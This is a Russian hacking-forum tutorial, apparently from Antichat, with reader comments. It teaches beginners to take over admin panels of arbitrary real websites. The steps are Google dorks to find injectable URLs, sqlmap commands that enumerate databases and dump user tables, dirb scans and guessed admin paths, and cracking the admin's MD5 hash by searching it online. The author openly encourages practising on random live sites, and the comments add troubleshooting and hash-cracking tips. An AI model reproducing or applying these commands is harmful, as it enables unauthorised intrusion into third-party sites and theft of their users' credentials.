Здравствуйте, уважаемы Античатлане! В этой статья, я хочу рассказать как за считанные минуты можно п получить доступ к Админке используя всего две программы из набора софта Kali Linux. Предполагается, что целью читателя является получение доступа к админ-панели любого сайта, находящегося в сети Интернет, у читателя имеется на рабочей машине Kali Linux. Ниже я расскажу способ как взломать именно тот сайт, который Вам нужен, имея минимум знаний. Итак, приступим. Если Вам нужно прокачать скилы в пентесте с нуля, первым делом в гугле вбиваем следующее: <code>"google dorks 2017 sqli" Ткнув мышью в первую понравившуюся ссылку мы увидим нечто следующее: inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= Скопируйте одну из строк в новую вкладку с гуглом, и вставьте её в поле запроса. Результатом запроса будут сайты, в URL`ах которых присутвуют символы, написанные после inurl:. Открыв произвольный сайт из списка жмём в поле браузера для ввода URL, и в конце адреса ставим одинарную кавычку "'" и жмём Enter. Пример: site.com/readnews.php?id=23' В результате, на странице мы должны увидеть следующее: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 Важно увидеть именно MySQL ошибку, а не PHP!!! Если Вы после ввода кавычки не увидели в сообщение об ошибке слова MySQL или вообще ни чего не увидели, то либо пробуйте следующий приём: Пример: site.com/readnews.php?id[]=23 Либо переходите к следующему сайту. Итак, увидев подобную ошибку на странице тестируемого сайта необходимо скопировать адрес страницы БЕЗ кавычки или КВАДРАТНЫХ СКОБОК. Затем открыть консоль и ввести в ней следующее: sqlmap -u site.com/readnews.php?id=23 --random-agent -f --dbs Эта комадна позволит Вам получить имена баз данных этого сайта. Во второй вкладке или окне консоли вводим другую команду: dirb http://site.com/readnews.php?id=23 Эта команда позволит Вам найти скрытые файлы и папки этого сайта. Пока ждём результатов работы программ, можно в ручную попробовать найти вместо dirb`a админку самостоятельно. для этого после site.com/ вводим: /admin /admin.php /login /login.php /phpmyadmin /webadmin Отлично, мы нашли страницу http://site.com/admin в которой имеется поле для ввода Логина и Пароля. Переходим в консоль, и смотрим на результат работы программы Sqlmap. Прекрасно, у нас имеется две базы данных: [*] information_schema [*] baza_eu Вводим в консоле команду, которая позволит нам получить список таблиц базы данных baza_eu: sqlmap -u site.com/readnews.php?id=23 --random-agent -f -D baza_eu --tables После того, как скрипт выполнит свою работу, что-то похожее на это: +--------------------------------+ | contact_people | | tbl_pages | | tbl_privileges | | tbl_submenu | | tbl_tools | | tbl_tools_vars | | tbl_users | +--------------------------------+ Нас интересуют логин и пароль от админки, следовательно мы ищем его в таблице tbl_users. Вводи следующее: sqlmap -u site.com/readnews.php?id=23 --random-agent -f -D baza_eu -T tbl_users --dump Программа предложит брутить хеши предложенных паролей на компе, необходимо отказаться от этого рази экономии времени (ну или можете соглашаться на все предложения программы, например на вопрос do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] ввести N). После этого вы получите список логинов и хешей паролей: +----+----------+-------------------------------------------------------+ | id | username | password | +----+---------+---------------------------------------------------------+ | 1 | admin | aba14f4d76e2d4350e2e164a5b49c788 | | 5 | user10 | dea9ddb25cbf2352cf4dec30222a02a5 | | 7 | user20 | bf23471d96d9cb4abf4965603136f98b | +----+----------+-------------------------------------------------------+ Мы получили заветные символы, однако в колоке password находятся отнюдь не пароли, а хеш, который можно конечно же и сбрутить. Но мы понадеемся на удачу и пойдём хитрым путём. Копируем хеш пароля и вставляем его в гугл. Вуаля, в первой ссылке на против нашего хеша мы находим 1528mads .Вставляем admin в поле логина и 1528mads в поле пароля и имеем счастье. Тварить можете с ним всё, что позволяет Вам админ-панель =) Если у Вас есть проблемы с использованием вышеописанных программ советую обратиться к Гуглу. В случае если Вам нужно получить доступ к админке определённого сайта http://site.com/ необходимо открыть программу OWASP и в центральный фрейм ввести небходимый Вам URL сайта. После 10-20 минут сканирования, внизу во вкладке "Оповещения" Вы найдёте кнопку с подписью "Sql-инъекция" и красным флажком. Далее необходимо скопировать уязвимую ссылку и провести вышеописанные действия. Удачи!!! P.S. Это моя первая статья, прошу особо не ругаться если что-то я упустил или забыл добавить.
Отлично, мы нашли страницу http://site.com/admin в которой имеется поле для ввода Логина и Пароля. Переходим в консоль, и смотрим на результат работы программы Sqlmap. Прекрасно, у нас имеется две базы данных: http://site.com/admin - вот сюда и вводи http://site.com/admin.php - или сюда
http://site.com/adrministrator http://site.com/adm http://site.com/administrator1 сюда попробуй зайди
Обращайте внимание на код, который написан после найденного адреса (403, 200, 300, 301). Гуглите что означают эти коды, если напротив адреса нет кода, то это папка которую dirb по словарю на наличие скрытых директрорий прочекает, после того как пройдется по корню
Подождите пока dirb переберет все директории, возможно админка находится не в корне а в одном из найденных каталогов. Если не ломается нужный Вам сайт, отложите его на потом и прокачивайте скилы на других сайтах
Не может быть чтобы у 15 сайтов под ряд dirb не находил админки. Вы точно включаете его и ждёте пока он пройдется по папкам от a до z? Какую дорку используете? Не знаю почему у Вас на 15 сайтах вместо полей для ввода пароля белый лист. Мне на каждом третьем сайте попадаются админки по адресу /admin/
15 сайтов это мало, ищите на других админки. Пробуйте другие дорки, используйте другие словари для dirbа. Всего доброго, хорошего настроения!
стараться то старается но это уже ни в какие ворота,ещё бы написать статью как запустить live kali и танцевать после того как запустится)) Люди вы что издеваетесь?! критику думаю нормально воспринимаешь.
Критику-то нормально воспринимаю, но гляньте в титл страницы, там написано: Мануал для новичков То есть этот текст для тех кто сегодня встал поздно днем с бодуна и решил кул-хацкером стать, эта статейка ему и придет на помощь.
Норм статья для тех, кто начинает почти с нуля, как я. В специфике информации о взломе зачастую отсутствует системность, за сим считаю, что любая систематизированная статья на эту тему несёт пользу. Спс ТС.
md5 - это алгоритм хеширования, а не алгоритм шифрования. Декодировать - никак. Сбрутить - с помощью, например, hashcat, либо чекнуть по онлайн базам cmd5.ru